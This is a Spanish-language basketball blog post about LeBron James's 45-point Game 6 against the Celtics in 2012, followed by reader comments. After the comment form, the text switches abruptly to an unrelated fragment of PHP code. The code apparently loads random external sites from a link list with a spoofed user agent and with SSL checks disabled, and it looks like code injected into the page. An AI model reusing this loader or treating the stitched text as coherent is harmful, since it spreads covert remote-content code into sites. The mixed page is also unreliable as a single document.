La Crónica: Un solo hombre

08 de June de 2012 por TheDeerHunter

“A nadie le gusta que le tiren tierra a la cara antes de estar muerto.”
Erik Spoelstra

Anoche vimos algo muy grande. Nadie en su sano juicio podía prever que iba a ocurrir algo así.

No es porque no hayamos visto actuaciones tan descomunales de LeBron. Nos vienen a la mente, por ejemplo, sus 48 puntos contra Detroit en el 2007, los 45 en Boston en la derrota del 7º o el triple doble al borde de la eliminación del 2009… Entonces vimos a un LeBron desatado, agresivo como una fiera salvaje. Lo de anoche fue más bien como quien recoje flores en el campo o quien unta mantequilla en la tostada. Frialdad sobrecogedora. Facilidad pasmosa. Inhumano.

“I just went to my habits. I wasn’t going to feel sorry for myself or anything. I just go out and play as hard as I can and try to make plays for our team. And at the end of the day, whatever happens happens.”
#6

No hubo infierno verde. Fue LeBron quien les llevó el infierno a domicilio. Asusta todo lo que se pueda decir al respecto. 45 puntos (discretos 17 Wade, los dos únicos Heat en dobles figuras), 15 rebotes y 5 asistencias. 15 canastas no asistidas. Sólo se puede encontrar un precedente similar en Wilt Chamberlain, 50-15-6 en el 5º contra Sant Louis en 1964. Paul Pierce se acordará toda la vida de esta noche. Una de las mayores decepciones que ha vivido la parroquia local en toda su historia en un choque de esta naturaleza.

Por lo que parece, existe una correlación entre la presencia de “King” James y las peores actuaciones del Big Three original de los Celtics. 31 puntos entre los 3. Las otras 3 peores fueron también contra él. 32 en el 2008 contra Cavaliers, 36 el año pasado o 37 en el 2010 también contra Cavs. Hay algo personal entre ellos. La herida sangrará todavía más el próximo sábado en Miami.

PREMIOS

MVP: Más de una vez hemos tenido la impresión de que los cracks de la NBA leían nuestro blog. Ayer alguien tildó de fracaso a Lebron James y hoy el angelito se ha ido a los 45 puntos, 15 rebotes y 5 asistencias con un impresionante 19 de 26 en tiros de campo. Él solo se ha cargado a los Celtics desde el primer minuto de partido.

Sorpresa: ¿Cuántos apostaban por que los Celtics dejarían escapar la serie en su propia casa?

Decepción: No fue un buen día para el Big Three original, sobretodo para Paul Pierce. 9 puntos con un 4 de 18.

Esfuerzo en vano: Rajon Rondo fue al único celtic al que le salieron medio bien las cosas. Sus 21 puntos y 10 asistencias significan otro doble-doble más en playoffs. Camino de la historia.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. jose antonio ramirez dice:
    #1

    Una pena que boston no pudiese certificar la clasificacion, no pudo ser. Muy mal partido en general de los celtics. Ahora tocara el mas dificil todavia, ganar en el AAA el septimo partido. Grandisimo lebron, pero no nos tiene que asustar, esto cambia todo muy rapido de un partido a otro y lo que queda son las sensaciones. Estoy convencido que los celtics haran la machada. Go celtics, ahora es cuando mas hay que estar con el equipo. Estoy convencido que la derrota ya esta olvidada y la motivacion mas alta todavia. Quien crea que los celtics moriran como ayer es que no conocen el espiritu de este equipo.

      Citar

  2. Nacho dice:
    #2

    Ayer alguien tildó de fracaso a Lebron James y hoy el angelito se ha ido a los 45 puntos, 15 rebotes y 5 asistencias con un impresionante 19 de 26 en tiros de campo.

    Ese fui yo. Y me lo temía cuando lo escribí. Pero me siento como los boxeadores sonados, que están K.O. y quieren seguir peleando. Lo sigo pensando. Hasta el momento y hasta que rubrique lo que había empezado y ayer continúo de forma impresionante. Sigo pensando que el basket es un juego de equipo. Jordan no ganó solo. Si este año gana Miami, rezaré lo que se me imponga y me demostrará que se puede ganar solo. Lo sigo dudando.
    Pero aquí estoy, dispuesto a los palos. “cuidado con el estómago, que ahí encajo peor”.

      Citar

  3. GreenPride dice:
    #3

    Simplemente LeBron… y la defensa de los Heat ( o la incapacidad de atacarla de los Celtics como se quiera). Una lástima para los Celtics que no pudieron entrar realmente en el partido en ningún momento lastrados por los problemas en su ataque.
    Salieron fuerte los Heat con un LeBron enchufado que puso rápidamente a los de Miami 10 arriba. Eran momentos de gran acierto por parte de LeBron que prácticamente metía todo lo que tiraba ante la impotencia de la defensa verde. Y contrariamente a lo que suele pasar con Boston, nunca consiguieron remontar la diferencia.
    Durante el primer tiempo un gran Rondo (19 puntos al descanso) fue manteniendo a los Celtics haciendo la goma a una diferencia que permitía creer en una remontada cuando LeBron bajase el pistón. Sin embargo, en cuanto Rondo dejó de anotar el ataque de los Celtics fue incapaz de sumar, negados ante un día para el olvido de Pierce que lastrado por sus 3 faltas en el segundo cuarto nunca cogió el ritmo y acabó con 4/18. Tampoco fue el día de KG que sólo pudo sumar 12 puntos y sin él a un gran nivel el ataque de Boston nunca pudo estar lo suficientemente bien para creer en la remontada. El otro gran problema fue el desacierto en los triples y la nula aportación del banco.
    Estas están siendo unas series dominadas desde la defensa y en este caso el partido de LeBron rompió la de los Celtics mientras que los de Boston nunca consiguieron encontrar la llave para que su ataque fluyera. Incluso con el gran partido de LeBron, creo que si Pierce y Garnett hubieran jugado al nivel del 5º en ataque, Boston hubiera tenido sus oportunidades de llevarse la victoria. Quizás eché en falta alguna medida desesperada para frenar el acierto de LeBron por parte de Rivers, algo así como doblarle el marcaje cada vez que recibiera o intentar una “box and one” para que no recibiera el balón, algo que intentase quitarle el ritmo en ataque e hiciera que tuvieran que anotar los demás.
    Más allá de LeBron, buena defensa colectiva de los Heat provocando 7 pérdidas a Rondo y controlando por primera vez a Garnett y triples importantes de Chalmers y Battier para ayudar un poco a LeBron. Mal partido en ataque de Wade que sigue sin poder superar la defensa de Boston.
    Ahora habrá 7º en Miami en una “Mision Imposible” en principio para los Celtics… aunque este equipo nos ha enseñado ya que se tiene que contar con ellos siempre. Para Boston, las claves serán poder hacer que KG vuelva a dominar la pintura, que Rondo pueda imponer un ritmo bajo de partido que evite contraataques, que puedan igualar el rebote, que Pierce juegue un partido decente en ataque y que el banco y los triples entren (y esto lo pongo junto porque Pietrus y Dooling suelen contribuir desde el triple). Y volvemos a lo comentado otras veces, si consiguen llegar a un final igualado tendrán muchas opciones. Por los Heat, LeBron intentará volver a dominar el partido. Si lo consigue y evitan que la defensa de Boston les controle, tendrán mucho ganado. En defensa deberán controlar a Rondo e intentar dominar el rebote para correr. Si ya meten a Wade en el partido en ataque sería lo mejor para ellos ya que con Bosh está claro que todavía no pueden contar para ser un factor ofensivo. Ahora la eliminatoria parece claramente inclinada del lado de Miami… veremos si a mis orgullosos verdes les queda algo que decir al repecto.

      Citar

  4. Viva_Dirk dice:
    #4

    Nacho:
    Ayer alguien tildó de fracaso a Lebron James y hoy el angelito se ha ido a los 45 puntos, 15 rebotes y 5 asistencias con un impresionante 19 de 26 en tiros de campo.

    Ese fui yo. Y me lo temía cuando lo escribí. Pero me siento como los boxeadores sonados, que están K.O. y quieren seguir peleando. Lo sigo pensando. Hasta el momento y hasta que rubrique lo que había empezado y ayer continúo de forma impresionante. Sigo pensando que el basket es un juego de equipo. Jordan no ganó solo. Si este año gana Miami, rezaré lo que se me imponga y me demostrará que se puede ganar solo. Lo sigo dudando.
    Pero aquí estoy, dispuesto a los palos. “cuidado con el estómago, que ahí encajo peor”.

    Pero bueno, si Wade ya ganó un anillo, y este si que lo hizo casi solo en las finales, con una actuación legendaria. Asi que ya me dirás como va a ganarlo Lebron solo, habiendola liado parda para juntarse con Wade y Bosh.

      Citar

  5. arivas dice:
    #5

    Por cierto qué tal Bosh? Me refiero fisicamente, de cara a proximos partidos.

      Citar

  6. GreenPride dice:
    #6

    arivas, Bosh demostró que no está plenamente recuperado, al menos a mi forma de verlo. Su tiro exterior no entra como antes y se le ve corriendo regular, quizás con ciertas precauciones. Es necesario para los Heat ante su falta de juego interior pero está como mucho al 50% diría yo.

      Citar

  7. David dice:
    #7

    Vaya disyuntiva: no sé si prefiero que sigan los Celtics -franquicia a la que le tengo enorme admiración- o soñar con un enfrentamiento Durant-Lebron. Qué sea lo que sea, lo seguro es que el 7° entre Miami y Boston será una locura.

      Citar

  8. nba dice:
    #8

    Muchos cuando acabo la serie contra Pacers, pensabamos que esta iba a ser un paseo militar para Miami.
    Gracias a Lebron y a sus pique con Garnett, hemos podido disfrutar de una serie larga con alternativas.
    Como ya comente la clave de Celtics es la aportación de Garnett y, Lebron esta claro que va a hacer lo necesario para llegar a la final como todos pronosticabamos antes de que se lesionase Bosh.
    Veremos conque nos sorprende Doc yo pronostico que gana Celtics tras triple ganador de Allen en los ultimos 10 seg.

      Citar

  9. rumbero dice:
    #9

    Vaya partidito del señor Lebron. A sacar el rodillo y no dejar opción a remontada en el último cuarto.
    A mi también me da la impresión que estos tios leen el blog y se pican. En fin…lo que está claro es que el Big Three está acabadísmo y no les veo pegando la machada en el AAA ni en pintura

      Citar

  10. Rompe dice:
    #10

    Yo creo que hubiera sido un “paseo militar” con Bosh en pista. Pero es lo que tiene jugártelo todo a tres cartas, que te falla una y tienes sólo dos jugadores que pueden aportar ofensivamente. Aún con esas, LeBron está dando unas clases magistrales y poco más puede hacer para llevarse el anillo. En una hipotética final, con Bosh al 100%, será apasionante. Si Bosh no está no le veo ninguna opción de victoria a Miami…

      Citar

  11. rumbero dice:
    #11

    De momento han salido enchufados los Celtics y Lebron no esta en modo dios, asi que va a estar entretenido

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>